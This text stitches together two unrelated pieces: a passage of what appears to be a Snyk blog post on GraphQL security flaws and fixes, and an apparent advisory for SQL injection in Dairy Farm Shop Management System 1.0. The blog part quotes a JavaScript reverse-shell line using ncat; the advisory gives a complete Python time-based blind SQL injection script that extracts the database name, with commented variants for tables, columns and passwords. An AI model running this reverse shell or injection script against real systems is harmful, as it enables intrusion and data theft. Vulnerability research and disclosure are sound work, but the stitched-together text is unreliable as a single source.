This vulnerability makes it possible to execute code on the system by overwriting one of the SonicJS service files with malicious JavaScript that was loaded by the SonicJS system during startup or reboot. For example, the following statement uses the child_process function to backdoor the application and connect to an attacker controlled IP address by leveraging the ncat program that is installed on the target system. 

    require("child_process").exec('ncat 127.0.0.1 4445 -e /bin/bash')

The Snyk Code report for this vulnerability can be seen below:

SonicJS can prevent this vulnerability in the future by requiring authentication and authorization for the query, and validating the provided file path to ensure special characters such as ../ are not allowed.  

**GraphQL introspection**

GraphQL’s introspection system can be used to discover what queries are supported by a GraphQL server. This includes types, fields, queries, mutations, and other information related to a GraphQL schema.

While this is a feature and is not a direct security issue, introspection can often be used to find hidden functionality that an attacker can abuse. 

Within the NodeJS ecosystem, JavaScript frameworks often enable introspection by default, which may not be clear to developers. So, when using the GraphQL framework without specifying settings, like in express-graphql below, introspection is enabled automatically. 

    import express from 'express'
    import graphqlHTTP from 'express-graphql'
    import Myschema from './schema'
    
    const app = express();
    app.use('/graphql', graphqlHTTP((req, res) => ({ 
      Schema: MySchema,
    })))

An example of this report within Snyk code can be seen below:

Since there might be legitimate cases where introspection is needed for a production application, this issue was reported as **low risk**. 

To disable introspection within express-graphql , use the NoSchemaIntrospectionCustomRule provided by the graphql-js. 

    import express from 'express'
    import graphqlHTTP from 'express-graphql'
    import Myschema from './schema'
    import { specifiedRules, NoSchemaIntrospectionCustomRule } from 'graphql';
    
    const app = express();
    app.use('/graphql', graphqlHTTP((req, res) => ({ 
      Schema: MySchema,
    validationRules: [...specifiedRules, NoSchemaIntrospectionCustomRule],
    })))

While having introspection in production can lead to security issues, it is often needed for development. The creators of ApolloServer tackled this issue by enabling or disabling introspection based on the production status. 

    // introspection is only enabled based on NODE_ENV
    const apolloServer = new ApolloServer({
      schema,
      introspection: process.env.NODE_ENV !== 'production' && CUSTOM_ENV !== 'production',
    });
    export default apolloServer;

If using another GraphQL framework, a third-party library such as the graphql-disable-introspection package can be used to validate rules within your GraphQL endpoint. 

**GraphQL denial of service**

Each query has a depth of nested objects that can be processed by a GraphQL endpoint. Most GraphQL frameworks do not have a default depth limit. Queries with unlimited depths can leave the framework vulnerable to denial of service (DoS) attacks, like in the following example:  

    {
        one {
            two {
                one {
                    two {
                        one…
                    }
                }
            }
        }
    }

However, for this issue to be exploitable, the GraphQL server must have a recursive pattern of field types where a two-way relationship exists. An example of this report within Snyk code can be seen below:

This DoS vulnerability was found  within mevn-cli. To fix this, the graphql-depth-limit package available through npm can be used as follows:

    import depthLimit from 'graphql-depth-limit'
    import express from 'express'
    import graphqlHTTP from 'express-graphql'
    import schema from './schema'
    
    
    const app = express() 
    app.use('/graphql', graphqlHTTP((req, res) => ({ 
      schema,
      validationRules: [ depthLimit(10) ]
    })))

Review this mevn-cli repository commit to see an example of this fix.

Another way to prevent DoS attacks is to check request body length within your GraphQL endpoint. Large queries can be an indication of DoS attacks, so monitoring query length is a simple and effective verification.

    // query length is checked here to prevent DoS
      app.use('/graphql', graphqlExpress((req) => {     
     const query = req.query.query || req.body.query;
        if (query && query.length > 2000) {
          // Normal GraphQL queries are not this long
          // Probably indicates someone trying to send an overly expensive query
          throw new Error('Query too large.');
        }
    
        return {
          schema,
          context: Object.assign({}, context),
          debug: true,
        };
      }));

**GraphQL injection**

By allowing an attacker to interfere with an application query, a GraphQL injection gives malicious parties access to data they normally can’t retrieve — including user data or any other data the application can access. In many cases, this data can be modified or deleted, causing persistent changes to the application’s content and behavior.

@octokit/core is a minimalistic library built to utilize GitHub’s REST API and GraphQL API to create GraphQL queries. In cases where user input is used to dynamically create a GraphQL, an attacker might be able to modify this query to access confidential information. An example of this issue can be seen below:

    app.get('/', async function(req, res) {
    
        let user = req.query.page;
    
        const { articles } = await octokit.graphql(
            `
              query lastIssues($owner: String!, $repo: String!) {
                repository(owner: ${input}, name: $repo) {
                  issues(last: $num) {
                    edges {
                      node {
                        title
                      }
                    }
                  }
                }
              }
            `,
            {
              owner: "octokit",
              repo: "graphql.js",
            }
          );

An example of this report within Snyk code can be seen below.

To prevent GraphQL injection, avoid passing user-entered parameters directly to a GraphQL query. If direct user input is required for performance, validate the input against a very strict allowlist of permitted characters — avoiding special characters such as ? & / < > ; - and (space) — and use a vendor-supplied escaping routine if possible.

**Conclusion**

Snyk Code currently supports the following GraphQL frameworks through a variety of taint analysis and semantic rules: 

*   express-graphql
*   koa-graphql
*   mercurius
*   apollo-server
*   graphql-js

We hope to add further support for GraphQL vulnerabilities such as insecure object, direct reference, and access control issues. While GraphQL is currently supported for JavaScript, we aim to add more languages and code quality rules to address issues such as batching attacks and query complexity.

**Improving GraphQL security with Snyk**

Scan your applications with Snyk Code to find and fix vulnerabilities.

CVE-2022-42002: Improving GraphQL security with static analysis and Snyk Code | Snyk

Dairy Farm Shop Management System 1.0 is vulnerable to SQL Injection via bwdate-report-ds.php file.

vendor：https://phpgurukul.com/

download link：https://phpgurukul.com/?smd\_process\_download=1&download\_id=10924

Vulnerability trigger parameter: $cname

The process of vulnerability discovery is as follows：

You can see in the source code that the '$cname' in the php file is likely to be injected. Then you can judge from the following if else statement that this variable can splice malicious code, and you can perform blind injection.

POC:

import requests
import time
 
url \= "http://localhost/DFScms/dfsms/bwdate-report-ds.php"
flag \= ''
 
 
def payload(i, j):
    startTime\=time.time()
    \# 数据库名字
    sql \= "companyname=-1'and if(ascii(substr(database(),%d,1))>%d,sleep(3),-1)and'1=1&submit="%(i,j)
    \# 表名
    #sql = "id = if(ascii(substr((select group\_concat(table\_name) from information\_schema.columns where table\_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    \# 列名
    #sql = "id = if(ascii(substr((select group\_concat(column\_name) from information\_schema.columns where table\_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    \# 查询flag
    #sql = "id = if(ascii(substr((select password from users),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
 
    headers \= {
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": "PHPSESSID=iv4ujtg89cbg68hdmaqb4bbkl7"
    }
 
    r \= requests.post(url\=url, headers\=headers, data\=sql, timeout\=15, verify\=False)
    \# print (r.url)
    if time.time()\-startTime\>2:
        res \= 1
    else:
        res \= 0
    return res
 
 
def exp():
    global flag
    for i in range(1, 200):
        low \= 31
        high \= 127
        while low <= high:
            mid \= (low + high) // 2
            res \= payload(i, mid)
            if res:
                low \= mid + 1
            else:
                high \= mid \- 1
        f \= int((low + high + 1)) // 2
        if (f \== 127 or f \== 31):
            break
        \# print (f)
        flag += chr(f)
        print(flag)
 
 
exp()

The database name was exploded

Tag

#sql